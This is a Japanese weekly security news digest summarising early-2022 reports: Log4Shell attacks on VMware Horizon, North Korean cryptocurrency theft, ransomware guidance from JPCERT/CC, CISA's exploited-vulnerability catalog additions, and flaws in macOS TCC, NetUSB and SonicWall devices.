View profile

今週の気になるセキュリティニュース - Issue #49

Weekly newsletter of Masafumi Negishi
Weekly newsletter of Masafumi Negishi
事件、事故
ウクライナ政府の Web サイトが不正に改ざん
攻撃、脅威
Cloudflare から 2021年第4四半期の DDoS 攻撃に関するレポート
VMware Horizon の Log4Shell 脆弱性 (CVE-2021-44228) を攻撃する中国の攻撃者グループの活動について、Microsoft が報告
As early as January 4, attackers started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon. Our investigation shows that successful intrusions in these campaigns led to the deployment of the NightSky ransomware.
These attacks are performed by a China-based ransomware operator that we’re tracking as DEV-0401. DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo, and Rook, and has similarly exploited Internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473).
米国の重要インフラに対するロシアからの攻撃について、CISA, FBI, NSA が共同で注意喚起
イランの攻撃者グループ MuddyWater が利用しているマルウェアについて、米サイバー軍 (U.S. Cyber Command) が情報公開
北朝鮮の攻撃者グループによる暗号資産を狙う攻撃活動の 2021年の状況について、Chainalysis が報告
North Korean cybercriminals had a banner year in 2021, launching at least seven attacks on cryptocurrency platforms that extracted nearly $400 million worth of digital assets last year. These attacks targeted primarily investment firms and centralized exchanges, and made use of phishing lures, code exploits, malware, and advanced social engineering to siphon funds out of these organizations’ internet-connected “hot” wallets into DPRK-controlled addresses. Once North Korea gained custody of the funds, they began a careful laundering process to cover up and cash out.
北朝鮮の攻撃者グループ BlueNoroff による暗号資産を狙う攻撃活動について、Kaspersky Lab が報告
BlueNoroff is the name of an APT group coined by Kaspersky researchers while investigating the notorious attack on Bangladesh’s Central Bank back in 2016. A mysterious group with links to Lazarus and an unusual financial motivation for an APT. The group seems to work more like a unit within a larger formation of Lazarus attackers, with the ability to tap into its vast resources: be it malware implants, exploits, or infrastructure. See our earlier publication about BlueNoroff attacks on the banking sector.
Also, we have previously reported on cryptocurrency-focused BlueNoroff attacks. It appears that BlueNoroff shifted focus from hitting banks and SWIFT-connected servers to solely cryptocurrency businesses as the main source of the group’s illegal income. These attackers even took the long route of building fake cryptocurrency software development companies in order to trick their victims into installing legitimate-looking applications that eventually receive backdoored updates. We reported about the first variant of such software back in 2018, but there were many other samples to be found, which was later reported by the US CISA (Cybersecurity and Infrastructure Security Agency) in 2021.
The group is currently active (recent activity was spotted in November 2021).
JPCERT/CC が「侵入型ランサムウェア攻撃を受けたら読むFAQ」を公開
ランサムウェアを用いた攻撃は、一台から数台の端末の感染被害から、業務停止を引き起こす大規模な感染被害に至るものまでさまざまです。本FAQでは、企業や組織の内部ネットワークに攻撃者が「侵入」した後、情報窃取やランサムウェアを用いたファイルの暗号化などを行う攻撃の被害に遭った場合の対応のポイントや留意点などをFAQ形式で記載します。
JPCERT/CCでは、こうした攻撃を他のランサムウェアを用いた攻撃と区別し、「侵入型ランサムウェア攻撃」と呼びます。
Emsisoft から 2021年第4四半期のランサムウェアに関するレポート
脆弱性
CISA が攻撃に利用されている脆弱性カタログ (Known Exploited Vulnerabilities Catalog) に新たに 15の脆弱性を追加
CISA has added 15 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.
macOS の保護機能である TCC (Transparency, Consent, and Control) をバイパスできる脆弱性
多数のネットワーク機器で利用されている KCodes NetUSB にリモートコード実行可能な脆弱性 (CVE-2021-45608)
Rapid7 が SonicWall SMA 100 シリーズの脆弱性について詳細情報を公開
Over the course of routine security research, Rapid7 researcher Jake Baines discovered and reported five vulnerabilities involving the SonicWall Secure Mobile Access (SMA) 100 series of devices, which includes SMA 200, 210, 400, 410, and 500v. The most serious of these issues can lead to unauthenticated remote code execution (RCE) on affected devices. We reported these issues to SonicWall, who published software updates and have released fixes to customers and channel partners on December 7, 2021. Rapid7 urges users of the SonicWall SMA 100 series to apply these updates as soon as possible. The table below summarizes the issues found.
その他
Did you enjoy this issue? Yes No
Weekly newsletter of Masafumi Negishi
Weekly newsletter of Masafumi Negishi

Security Researcher, IIJ-SECT, SANS Instructor in Japan, OWASP Japan Advisory Board, WASForum Hardening Project, 子供たちが安心して使える安全なネット社会を実現したいですね。

In order to unsubscribe, click here.
If you were forwarded this newsletter and you like it, you can subscribe here.
Created with Revue by Twitter.